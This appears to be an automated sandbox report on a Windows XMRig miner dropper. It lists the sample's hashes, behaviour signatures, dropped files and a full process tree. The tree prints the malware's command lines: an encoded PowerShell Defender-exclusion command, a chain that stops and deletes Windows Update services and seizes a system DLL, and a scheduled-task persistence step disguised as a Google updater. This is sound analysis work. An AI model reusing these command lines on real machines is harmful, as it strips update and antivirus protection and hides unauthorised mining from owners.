Analysis
-
max time kernel
299s -
max time network
274s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
15-05-2022 10:15
General
-
Target
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
-
Size
7.6MB
-
MD5
95104aa61ed30687c13e5c644d5722f3
-
SHA1
f9788f808044d448f73203d93da0021cefb781ff
-
SHA256
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
-
SHA512
99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner Payload 5 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 41 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "ayfzchqlcjzzno"4⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe hhmzomdryxklm1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRSWr9mZW0WjQ8Zp6uvmLE6u5mJa6blLxbhLUBAH2hxKbhKEsyAtsV/R69zSzs3rP9kwrKtV5rbpmU/ciKPfPbhE9OKMMZXsI4UuRWZka8gS1s3HImYphWDV4wtqbeoHFj9g+eZNUoxfSBEn9L8w689dicSe5gi9g1CuCFLqyc7rwP/qjv/3JltIuH5LITKSCk7NXUnWeSDcKY+NEgVfPhJqoLEg0aeDg0KzxJrSUBDIJsbJWIc9iXONDbVMTVT325hS49GeGAI3OCMHKRR3rdOlsV6M9LUsKiFtUKe023Fiqki/2NFI17HEJ11UF+t6f3f98YUZokpWGVfv/F+VZIliwJaLVyzmm8cmJbvj/Kk9fw4aMKco/zTvKVFpN7WHBE5ihOAIdgLEtFFOECZ0VkdHbSg7zj8LXWP3XBDgZmT/PqsiIA0H3OwZNBjcY4rgjXQuml3y2wHeGb80pVVWBuMCIL8sCKDGpDbxiGDcBPcXfVWLdW+mS2VMIb3O/HlHhTYbdCuIHWH/bwUTs0vfQ83nR1mapBl3HhjShQnY40eZw0N1hMUMfCNjyNzWVgfBMhy9MwGaqnFJcQDpiYiVz61SrdLFCtpEnS3/kpJJXUzUBm0N2+JFiygLQGxw1SnSpP2EyTmdeaAN2uFWIS+BKCPJnp+Urs4ZIl3L86i6Tua4xkWIuaHTvQcBBqfq2BUHq/tLhHwx6yCrF/kfnl/5iXfLuCspUzlw6ZMz1cm2MDpBcOg1/gqzqrt+nyVDaTWBNnlqQtGRUYtUgvt5UXluuo835dbfAbWdkMMKIb7n2tZu2O5jsprX3nRnflrXNwa4aGTIlireC/ZpMF870p7vGDEFpva1T0Rd09ATLL1v8gEbuv8MViLO6cBi+L9jUR0yZfcdT7y8lHnRy/+8C79u/c9DjZfyQB8NJv62KZdxCwBzSeLR5MMSp11Y2skr66+YEXG2FRRWrXAlH2bZXv98TaPSbt0i43nk4Yz7s+ytCPFUNIeIoxV9ce2xdOpHqqFCtwT8eJ9EaMxFCuVWhNc9ECcQ2wJtJ2BTuhX2x4mJKeaQTai1sy8DVQYd52treWJZeQG+84IKsCqBOo4TZLL7GKMsSj+J3fMBL82oHYCVo/XwBH9fjo36EWBjibeA1qOBj3n8/hOcGirQ/WjUG5965/cSYWzjatv0njtxER7lnH9HMnXMsHXUpgPeDkQYQe8tWGkKJfOjKWvOKULJTdqwcjKrySMCAnwM23+lrIvjgkHDSFXzrE4bsgtfQQLgMvxtEV0uEXKS5q7oSkWyt2f8078oXmh5OhNyLJn6XCoGx/NQGZ8UxzjcKczeCotM0TNeWj+SABRXgkf1VUKrXmJ0CAlPIjguo+q4co87MqHySF8+C6J7s6n/f1l++/reoGTPOhnw7iNjxqQsdhFqi8WdxxhNztJR1CeWprsRqngRs4eZ0B2KyfMQDOnyRkBthFTsKUv8+JSQD5ORke/9r2kNBdlHH3NamvS16q1YsdXFYsvFCMrBnbCTsCu+tasasTw82VpHrmPvBHdUFcaccuCCLHfZL28RuT4oBeO3lR+nHIbW9b5laMXY0Dn9kqMFd7Vj66+/jyFUG1pVWHJgudOaJbM3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
7.6MB
MD595104aa61ed30687c13e5c644d5722f3
SHA1f9788f808044d448f73203d93da0021cefb781ff
SHA256a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA51299dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Program Files\Windows\services.exeFilesize
7.6MB
MD595104aa61ed30687c13e5c644d5722f3
SHA1f9788f808044d448f73203d93da0021cefb781ff
SHA256a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
SHA51299dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/68-381-0x0000000000000000-mapping.dmp
-
memory/200-217-0x0000000000000000-mapping.dmp
-
memory/200-233-0x000002D476CA0000-0x000002D476CBC000-memory.dmpFilesize
112KB
-
memory/200-239-0x000002D477900000-0x000002D4779B9000-memory.dmpFilesize
740KB
-
memory/200-273-0x000002D476CC0000-0x000002D476CCA000-memory.dmpFilesize
40KB
-
memory/304-175-0x0000000000000000-mapping.dmp
-
memory/316-176-0x0000000000000000-mapping.dmp
-
memory/320-216-0x0000000000000000-mapping.dmp
-
memory/412-190-0x0000000000000000-mapping.dmp
-
memory/412-386-0x0000000000000000-mapping.dmp
-
memory/428-180-0x0000000000000000-mapping.dmp
-
memory/524-189-0x0000000000000000-mapping.dmp
-
memory/796-374-0x0000000000000000-mapping.dmp
-
memory/836-384-0x0000000000000000-mapping.dmp
-
memory/872-382-0x0000000000000000-mapping.dmp
-
memory/1172-392-0x0000000000000000-mapping.dmp
-
memory/1376-401-0x00000202326A0000-0x00000202326C0000-memory.dmpFilesize
128KB
-
memory/1376-398-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1376-415-0x00000202327E0000-0x0000020232800000-memory.dmpFilesize
128KB
-
memory/1376-405-0x0000020233340000-0x0000020233380000-memory.dmpFilesize
256KB
-
memory/1376-403-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1376-396-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1376-397-0x000000014036DB84-mapping.dmp
-
memory/1376-400-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1412-194-0x0000000000000000-mapping.dmp
-
memory/1424-365-0x0000000000000000-mapping.dmp
-
memory/1632-184-0x0000000000000000-mapping.dmp
-
memory/1716-178-0x0000000000000000-mapping.dmp
-
memory/1724-389-0x0000000000000000-mapping.dmp
-
memory/1800-363-0x0000000000000000-mapping.dmp
-
memory/1812-133-0x0000000000000000-mapping.dmp
-
memory/1876-373-0x000001D49A3E0000-0x000001D49A3E6000-memory.dmpFilesize
24KB
-
memory/1876-383-0x000001D4B2DC0000-0x000001D4B2DD2000-memory.dmpFilesize
72KB
-
memory/1928-393-0x0000000000000000-mapping.dmp
-
memory/1988-387-0x0000000000000000-mapping.dmp
-
memory/2072-197-0x0000000000000000-mapping.dmp
-
memory/2076-196-0x0000000000000000-mapping.dmp
-
memory/2088-174-0x0000000000000000-mapping.dmp
-
memory/2100-369-0x0000000000000000-mapping.dmp
-
memory/2188-204-0x0000000000400000-0x0000000001119000-memory.dmpFilesize
13.1MB
-
memory/2200-182-0x0000000000000000-mapping.dmp
-
memory/2244-411-0x000001FB6D0E0000-0x000001FB6D0E6000-memory.dmpFilesize
24KB
-
memory/2244-414-0x000001FB6CD70000-0x000001FB6CD77000-memory.dmpFilesize
28KB
-
memory/2252-188-0x0000000000000000-mapping.dmp
-
memory/2308-177-0x0000000000000000-mapping.dmp
-
memory/2492-201-0x0000000000000000-mapping.dmp
-
memory/2512-195-0x0000000000000000-mapping.dmp
-
memory/2524-199-0x0000000000000000-mapping.dmp
-
memory/2536-366-0x0000000000000000-mapping.dmp
-
memory/2568-395-0x0000000000000000-mapping.dmp
-
memory/2568-198-0x0000000000000000-mapping.dmp
-
memory/2708-173-0x0000000000000000-mapping.dmp
-
memory/2756-367-0x0000000000000000-mapping.dmp
-
memory/2772-181-0x0000000000000000-mapping.dmp
-
memory/2828-179-0x0000000000000000-mapping.dmp
-
memory/3132-187-0x0000000000000000-mapping.dmp
-
memory/3168-191-0x0000000000000000-mapping.dmp
-
memory/3320-388-0x0000000000000000-mapping.dmp
-
memory/3324-372-0x0000000000000000-mapping.dmp
-
memory/3336-370-0x0000000000000000-mapping.dmp
-
memory/3528-368-0x0000000000000000-mapping.dmp
-
memory/3544-380-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/3544-375-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/3544-376-0x0000000000401BEA-mapping.dmp
-
memory/3672-390-0x0000000000000000-mapping.dmp
-
memory/3732-192-0x0000000000000000-mapping.dmp
-
memory/3756-185-0x0000000000000000-mapping.dmp
-
memory/3768-193-0x0000000000000000-mapping.dmp
-
memory/3780-134-0x0000000000000000-mapping.dmp
-
memory/3780-139-0x00000210F0540000-0x00000210F0562000-memory.dmpFilesize
136KB
-
memory/3780-143-0x00000210F1030000-0x00000210F10A6000-memory.dmpFilesize
472KB
-
memory/3876-371-0x0000000000000000-mapping.dmp
-
memory/3900-183-0x0000000000000000-mapping.dmp
-
memory/3904-119-0x0000000000400000-0x0000000001119000-memory.dmpFilesize
13.1MB
-
memory/3908-186-0x0000000000000000-mapping.dmp
-
memory/3924-126-0x0000019BA29A0000-0x0000019BA2DBC000-memory.dmpFilesize
4.1MB
-
memory/3924-121-0x0000019B87920000-0x0000019B87D3C000-memory.dmpFilesize
4.1MB
-
memory/4036-391-0x0000000000000000-mapping.dmp
-
memory/4052-364-0x0000000000000000-mapping.dmp
-
memory/4056-394-0x0000000000000000-mapping.dmp